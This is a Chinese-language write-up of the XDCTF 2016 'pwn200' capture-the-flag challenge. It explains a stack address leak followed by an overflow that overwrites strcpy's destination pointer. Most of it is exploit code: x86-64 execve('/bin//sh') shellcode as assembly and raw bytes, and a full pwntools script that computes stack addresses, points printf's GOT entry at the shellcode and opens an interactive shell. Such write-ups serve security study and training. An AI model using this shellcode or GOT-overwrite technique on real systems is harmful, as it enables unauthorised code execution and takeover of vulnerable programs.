[XDCTF2016](pwn)pwn200

---

简介 :

2016 西电 CTF 线上赛 pwn200

---

分析 :

首先该题目没有开启 NX 保护 , 也就是有可能需要将 shellcode 写入到栈上
该题目需要进行两次溢出
1. 第一次溢出可以 leak 出 main 函数的栈底地址 , 这样可以得到我们写入的 shellcode 的地址
2. 第二次溢出可以覆盖 strcpy 的 dest 参数指针 , 达到任意地址写的目的

Paste_Image.png

Paste_Image.png

Paste_Image.png

---

利用代码 :

global _start
        _start:
                mul esi
                push rax
                mov rdi, "/bin//sh"
                push rdi
                mov rdi, rsp
                mov al, 59
                syscall

#!/usr/bin/env python
# coding:utf-8

import pwn
import binascii

shellcode = "\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"

Io = pwn.process("./pwn200")

# concat the string
print Io.recvline()
Io.send(shellcode + "\xcc" * (0x30 - len(shellcode)))
main_rbp_addr = pwn.u64(Io.readline()[48:48+6] + "\x00\x00")
print "[+] rbp (main) : %s" % (hex(main_rbp_addr))
main_stack_size = 0x10
address_size = 0x08
input_name_rbp_addr = main_rbp_addr - main_stack_size - address_size * 2
print "[+] rbp (input_name) : %s" % (hex(input_name_rbp_addr))
input_name_stack_size = 0x40
input_money_rbp_addr = input_name_rbp_addr - input_name_stack_size - 0x10 - 0x10
print "[+] rbp (input_money) : %s" % (hex(input_money_rbp_addr))


# send id
Io.sendline("1")
print Io.readline()
print Io.readline()

# send money
buffer_size = 0x40
printf_got = pwn.p64(0x602030)
shellcode_addr = pwn.p64(input_name_rbp_addr - 0x30)
payload = shellcode_addr + "\x00" * (buffer_size - address_size * 2) + printf_got
print "[+] [LENGTH] : %d" % (len(payload))

with open("payload.dat", "w") as f:
    f.write(payload)

# send payload
Io.send(payload)
Io.interactive()

---

知识储备 :

编写shellcode
函数调用的栈帧变换
64位程序的用户空间的地址用 6 字节表示